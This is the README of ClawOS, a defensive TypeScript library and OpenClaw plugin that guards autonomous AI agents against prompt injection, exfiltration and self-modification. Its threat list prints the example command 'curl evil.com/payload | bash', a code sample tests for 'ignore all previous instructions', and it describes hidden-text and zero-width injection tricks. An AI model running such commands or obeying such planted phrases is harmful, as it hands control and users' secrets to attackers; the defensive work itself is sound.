Skip to content

Security architecture for autonomous agents — 6-layer defense-in-depth

License

Notifications You must be signed in to change notification settings

yassinebkr/clawos

Repository files navigation

TypeScript Tests License Layers

🛡️ ClawOS

Security Architecture for Autonomous AI Agents

10-layer defense system that protects AI agents from prompt injection, data exfiltration, session corruption, and unauthorized actions. Built for OpenClaw, usable standalone.


⚡ Fork required: The before_tool_call hook (used by Layer C) is not yet available in upstream OpenClaw. It's implemented in our fork and submitted as PRs #10678, #10679, and #10680 (all CI green, pending maintainer review). The gateway_start lifecycle hook also depends on PR #10679. All other hooks work with upstream OpenClaw.

Why ClawOS?

Autonomous AI agents can browse the web, execute code, send messages, and modify files. This makes them powerful — and dangerous. A single prompt injection hidden in a webpage can hijack an agent into:

  • Exfiltrating secrets — API keys, credentials, private messages
  • Executing malicious codecurl evil.com/payload | bash
  • Impersonating the user — sending messages, emails, tweets
  • Destroying data — deleting files, corrupting databases
  • Self-modifying — rewriting its own instructions to become permanently compromised

Traditional content filters can't solve this. They pattern-match on known attacks while missing novel ones. ClawOS takes a fundamentally different approach: track where data came from, control what it's allowed to do, and verify everything.

Architecture

ClawOS implements defense-in-depth with 9 independent layers. Each layer operates autonomously — if one fails, the others still protect.

Layer Name Function Status
Canary Token Tripwire Exfiltration detection via embedded token ✅ Active
LF File Write Guard Block agent writes to critical files (SOUL.md, AGENTS.md, openclaw.json) ✅ Tested
LC Privilege Separation Block dangerous tools during active threats ✅ Active
L5 Trust Registry Hash pinning, signature verification ✅ Active
L4+ External Content Scanner Indirect prompt injection detection ✅ Active
L4 Signal Detection 50+ attack patterns, advisory-only ✅ Active
L3 Runtime Security Process isolation, behavioral monitoring Advisory
L2 Capability Control Skill manifests, least-privilege permissions Advisory
L1 Content Tagging Source tracking, trust level provenance ✅ Active
L0 Session Integrity State validation, auto-repair, checkpoints ✅ Active

Data Flow

User message ──→ [L1: Tag source=user, trust=owner]
                    │
                    ▼
              ┌──────────────┐
              │ L4: Signal   │ ──→ Advisory: injection? exfiltration?
              │   Detection  │
              └──────────────┘
                    │
                    ▼
              ┌──────────────┐
              │ L2: Check    │ ──→ Does this skill have permission?
              │ Capabilities │
              └──────────────┘
                    │
                    ▼
              ┌──────────────┐
              │ L3: Execute  │ ──→ Sandboxed, monitored, resource-limited
              │ in Sandbox   │
              └──────────────┘
                    │
                    ▼
Tool output ──→ [L4+: Scan external content for injection]
                    │
              ┌──────────────┐
              │ LC: Privilege│ ──→ Threat detected? Block dangerous tools
              │ Separation   │
              └──────────────┘
                    │
                    ▼
              ┌──────────────┐
              │   Canary     │ ──→ Token leaked? Exfiltration confirmed
              │   Check      │
              └──────────────┘
                    │
                    ▼
              ┌──────────────┐
              │ L0: Validate │ ──→ Session intact? Auto-repair    
                                          if broken
              │   Session    │
              └──────────────┘
                    │
                    ▼
              Anthropic API (clean, validated messages)

Layer Details

L0: Session Integrity — Foundation

Content filters, compaction, and API errors can corrupt the message history, creating orphaned tool_result blocks that permanently brick the agent session.

L0 validates and repairs sessions automatically:

import { validate, repair, isValid, createSessionIntegrity } from 'clawos';

// Quick check
if (!isValid(messages)) {
  const result = repair(messages);
  console.log(`Fixed ${result.repairs.length} issues`);
}

// Full validation with details
const validation = validate(messages);
if (!validation.valid) {
  console.log('Orphaned:', validation.orphanedIds);
  console.log('Incomplete:', validation.incompleteIds);
}

// Controller with checkpoints and auto-repair
const integrity = createSessionIntegrity({ autoRepair: true });
integrity.validateOrThrow(session);

Also includes bootstrap file integrity monitoring — critical files are hash-pinned at startup, with modifications triggering alerts based on tier (critical → immediate alert, sensitive → logged, monitored → tracked).

L1: Content Tagging — Provenance

Every piece of data is tagged with its source, trust level, and provenance chain. Trust can only go down, never up — if you mix user input with untrusted web content, the result is untrusted.

import { tag, resolveTrust, merge, userSource, toolSource } from 'clawos';

const userMsg = tag("Hello", userSource("+1234567890"), "user");
const webData = tag(searchResults, toolSource("web_search"), "tool");

// Merge: trust = min(user, tool) = "tool"
const combined = merge([userMsg, webData], summary, agentSource("main"));
console.log(combined.tag.trust); // "tool"

// Trust can only go down
resolveTrust(["user", "untrusted"]); // "untrusted"

L2: Capability Control — Permissions

Skills declare capabilities in manifests. The policy engine enforces least-privilege access.

import { registerManifest, checkPermission, createContext } from 'clawos';

registerManifest({
  id: 'web-search',
  capabilities: [
    { capability: 'net:https', reason: 'Fetch search results', required: true },
  ],
  minInputTrust: 'tool',
  outputTrust: 'tool',
  allowedDomains: ['api.search.com'],
});

const result = checkPermission(getManifest("web-search")!, inputTag);
// result.allowed, result.granted, result.denied

L3: Runtime Security — Isolation

Execute skills in sandboxed environments with resource limits and behavioral monitoring.

import { selectIsolationLevel, createSandboxConfig, BehavioralMonitor } from 'clawos';

// Auto-select isolation based on trust + capabilities
const level = selectIsolationLevel(manifest, inputTag);
// 0 = unrestricted, 1 = child process, 2 = bubblewrap sandbox

const config = createSandboxConfig(manifest, level, '/workspace');
// config.allowedPaths, config.allowedDomains, config.resourceLimits

L4: Signal Detection — Advisory

Scan content for 50+ attack patterns including prompt injection, data exfiltration, encoding tricks, and roleplay attacks. Advisory-only — flags but never blocks.

import { scanForSignals, hasInjectionSignals, createScanner } from 'clawos';

if (hasInjectionSignals("ignore all previous instructions")) {
  console.warn("Injection attempt detected");
}

const signals = scanForSignals(untrustedContent, "untrusted", sessionId);
for (const signal of signals) {
  console.log(`${signal.category}: ${signal.pattern} (${signal.confidence})`);
}

L4+: External Content Scanner — Indirect Injection

Specialized scanner for tool results from web-facing sources (web_fetch, web_search, browser). Detects indirect prompt injection — attacks hidden in webpages, search results, and API responses.

16 external-specific patterns including:

  • Hidden instructions targeting AI assistants
  • CSS/HTML invisible text injection
  • Zero-width character encoding
  • Data exfiltration via response manipulation
  • Instruction density heuristics

LF: File Write Guard — Critical File Protection

LF unconditionally blocks agent tools (write, edit, exec) from modifying critical files. This protects the agent's identity and configuration from self-modification attacks — even if injection bypasses all other layers.

Protected files (by tier):

Tier Files Action
Critical SOUL.md, AGENTS.md, openclaw.json Blocked — agent tools cannot modify
Sensitive USER.md, IDENTITY.md, BOOTSTRAP.md Logged + alerted
Monitored HEARTBEAT.md, TOOLS.md Tracked
🔒 [ClawOS LF] BLOCKED write → SOUL.md (critical).
   This file can only be modified by the gateway or plugin, not by agent tools.

🔒 [ClawOS LF] BLOCKED exec targeting critical file "SOUL.md".
   This file can only be modified by the gateway or plugin.

The gateway and plugins write via fs directly, bypassing the hook — so the human can still edit these files through the gateway config or manually.

Tested and confirmed working (Feb 17, 2026):

  • write to SOUL.md → ✅ Blocked
  • edit to AGENTS.md → ✅ Blocked
  • exec echo > SOUL.md → ✅ Blocked
  • Normal file writes → ✅ Pass through

LC: Privilege Separation — Enforcement

When L4+ detects high-severity injection signals in external content, LC immediately restricts dangerous tools for the current turn:

Blocked Allowed
exec, write, edit read, web_search
message, gateway web_fetch, browser
sessions_send image, process

Restrictions lift automatically on the next user message (fresh trust context) or after a 5-minute TTL safety net.

This is the critical insight: detection without prevention is useless. L4+ detecting an injection means nothing if the agent can still execute arbitrary code. LC is what makes detection actionable.

L5: Trust Registry — Verification

Track trust metadata for skills and dependencies. Hash-pin code, verify signatures, and monitor for vulnerabilities.

import { createTrustRegistry, calculateHash } from 'clawos';

const registry = createTrustRegistry();
await registry.init();

await registry.pin("my-skill", calculateHash(skillCode));

const result = await registry.verify("my-skill", skillCode);
if (!result.verified) {
  console.error(`Blocked: ${result.reason}`);
}

🐤 Canary Token — Tripwire

A unique random token is generated per gateway restart and embedded in the agent's system context. Every tool result is checked for the canary. If it appears in external content, it confirms a prompt injection successfully exfiltrated system context.

This is a detection-only mechanism — it can't prevent exfiltration, but it provides definitive proof that it happened.

OpenClaw Plugin

ClawOS ships as a production plugin for OpenClaw, integrating all 9 layers via gateway hooks:

Hook Layers Purpose
gateway_start L0, L5 Scan all sessions, snapshot protected files
message_received L4, LC Scan inbound messages, clear threat state
before_agent_start L0, L1, L4, 🐤 Validate session, tag context, inject canary
tool_result_persist L1, L4+, 🐤 Tag results, scan external content, check canary
before_tool_call LF, LC Block critical file writes + dangerous tools during threats

Plugin Commands

Command Description
/clawos Full security dashboard — layer status, signal stats, threat state
/clawos-scan Manual L0 session integrity scan
/clawos-signals Recent signal detection history
/clawos-integrity Bootstrap file integrity report

Known Issues

SIGUSR1 hot-reload does not activate before_tool_call hooks

OpenClaw wraps tools with hook interceptors once at process init (wrapToolWithHooks). If hasHooks("before_tool_call") returns false at that point (because plugins hadn't registered yet), the tools get the unwrapped execute(). A later SIGUSR1 hot-reload registers the hooks in the plugin registry, but doesn't re-wrap the already-initialized tools.

Workaround: Always do a full process kill + restart (not SIGUSR1) when deploying changes to before_tool_call hooks (LF, LC).

Impact: LF and LC are completely inactive until the gateway is fully restarted. This is a gap in OpenClaw's hot-reload lifecycle.

Security Lessons

Hard-won lessons from production deployment:

Agent self-verification is unreliable. A compromised agent reports "all clean" because the injection told it to. Only the human operator can verify externally.

Detection without prevention is insufficient. L4+ finding injection signals means nothing if the agent can still exec and write. Layer C makes detection actionable.

Never test injection content in the main session. Use isolated sub-agents for reading untrusted content.

File hash verification must be done by the user, not the agent. Hashes checked by a potentially-compromised agent prove nothing.

Trust flows downhill. Once data touches an untrusted source, it can never be re-elevated. This is a feature, not a bug.

Project Structure

clawos/
├── src/
│   ├── index.ts              # Re-exports all layers
│   ├── pipeline.ts           # Integration pipeline
│   ├── integrity/            # L0: Session Integrity
│   │   ├── types.ts          # Message, Checkpoint, Validation types
│   │   ├── validate.ts       # validate(), isValid(), tool pair checking
│   │   ├── repair.ts         # repair(), repairCopy(), reset()
│   │   ├── checkpoint.ts     # CheckpointManager, MemoryCheckpointStore
│   │   └── session-integrity.ts
│   ├── tagging/              # L1: Content Tagging
│   │   ├── types.ts          # TrustLevel, ContentTag, TaggedContent
│   │   ├── tag.ts            # tag(), merge(), transform(), serialize
│   │   └── sources.ts        # userSource(), toolSource(), SYSTEM_*
│   ├── capabilities/         # L2: Capability Control
│   │   ├── types.ts          # Capability, SkillManifest, OperatorPolicy
│   │   ├── manifest.ts       # validateManifest(), registerManifest()
│   │   └── policy.ts         # checkPermission(), enforce(), createContext()
│   ├── runtime/              # L3: Runtime Security
│   │   ├── types.ts          # SandboxConfig, SandboxResult, AnomalyRule
│   │   ├── sandbox.ts        # spawn(), execute(), killProcess()
│   │   ├── monitor.ts        # BehavioralMonitor, DEFAULT_RULES
│   │   └── isolation.ts      # selectIsolationLevel(), createSandboxConfig()
│   ├── signals/              # L4: Signal Detection
│   │   ├── types.ts          # Signal, ScanResult, PatternDefinition
│   │   ├── patterns.ts       # INJECTION/EXFILTRATION/ENCODING/ROLEPLAY
│   │   ├── scanner.ts        # SignalScanner, detectRepetition()
│   │   ├── emitter.ts        # DefaultSignalEmitter, SignalStore
│   │   └── signal-detection.ts
│   └── registry/             # L5: Trust Registry
│       ├── types.ts          # TrustEntry, VulnerabilityEntry, VerifyResult
│       ├── crypto.ts         # calculateHash(), verifySignature()
│       ├── store.ts          # RegistryStore, TrustCache
│       └── trust-registry.ts # TrustRegistry service
├── tests/                    # 492 tests across 21 files
├── docs/                     # Architecture, API, specs, case studies
└── dist/                     # Compiled output

Test Results

492 tests across 21 files — all passing

 ✓ integrity/validate.test.ts          (13 tests)
 ✓ integrity/repair.test.ts            (8 tests)
 ✓ integrity/checkpoint.test.ts        (29 tests)
 ✓ integrity/session-integrity.test.ts (19 tests)
 ✓ integrity.test.ts                   (26 tests)
 ✓ tagging/tag.test.ts                 (34 tests)
 ✓ tagging/trust.test.ts               (16 tests)
 ✓ tagging/sources.test.ts             (19 tests)
 ✓ tagging.test.ts                     (32 tests)
 ✓ capabilities/policy.test.ts         (14 tests)
 ✓ capabilities/manifest.test.ts       (21 tests)
 ✓ capabilities/enforcement.test.ts    (26 tests)
 ✓ runtime/monitor.test.ts             (20 tests)
 ✓ runtime/isolation.test.ts           (20 tests)
 ✓ signals/scanner.test.ts             (20 tests)
 ✓ signals/emitter.test.ts             (17 tests)
 ✓ registry/crypto.test.ts             (11 tests)
 ✓ integration.test.ts                 (27 tests)
 ✓ plugin/stress.test.ts               (89 tests)  ← 222k msgs/sec

Quickstart

Requirements

  • Node.js ≥ 20
  • Linux recommended (bubblewrap sandbox in L3 requires it)

Install

git clone https://github.com/yassinebkr/clawos.git
cd clawos
npm install
npm run build

Run Tests

npm test

Basic Usage

import { createPipeline, userSource } from 'clawos';

const pipeline = createPipeline({
  integrity: true,
  tagging: true,
  signals: true,
  capabilities: true,
  registry: true,
});

const result = await pipeline.process({
  content: userInput,
  source: userSource("+1234567890"),
  skillId: "web-search",
});

if (!result.allowed) {
  console.log(`Blocked by ${result.blockedBy}: ${result.reason}`);
}

Design Principles

  1. Tag, don't filter — Content is labeled with provenance, not silently dropped
  2. Advisory over blocking — Signal detection flags, enforcement layers block
  3. Capabilities are explicit — Denied by default, permitted by manifest
  4. Isolation is proportional — Lightweight for trusted skills, heavy for untrusted
  5. Performance is non-negotiable — <50ms p99 total overhead across all layers
  6. Defense in depth — Every layer operates independently; no single point of failure
  7. Trust flows downhill — Data touching untrusted sources can never be re-elevated

Roadmap

  • Rust rewrite — Memory-safe implementations for L3 (sandbox) and L5 (crypto), timing-safe operations
  • Standalone daemon (clawosd) — Rust binary exposing gRPC/Unix socket API, usable by any agent framework
  • Layer D: LLM-as-Judge — Second model evaluates whether a response was influenced by injection
  • Layer E: Semantic Boundaries — Research frontier — detect when an agent's behavior deviates from its declared intent

Documentation

Document Description
Architecture Layer interactions, data flow, design decisions
API Reference Public exports and signatures for all layers
Layer Specs Individual specs: L0–L5
OpenClaw Plugin Production plugin integration guide
Case Study Session corruption incident analysis
Security Audit Threat model and audit findings
Changelog Version history and bug fixes
Testing Test structure and coverage

Contributing

git clone https://github.com/yassinebkr/clawos.git
cd clawos
npm install
npm test          # Run all 492 tests
npm run build     # Compile TypeScript
npm run lint      # Type-check without emit

See CONTRIBUTING.md for coding standards and PR guidelines.

License

Apache 2.0 — see LICENSE.


Built by @yassinebkr — because autonomous agents deserve real security.

About

Security architecture for autonomous agents — 6-layer defense-in-depth

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published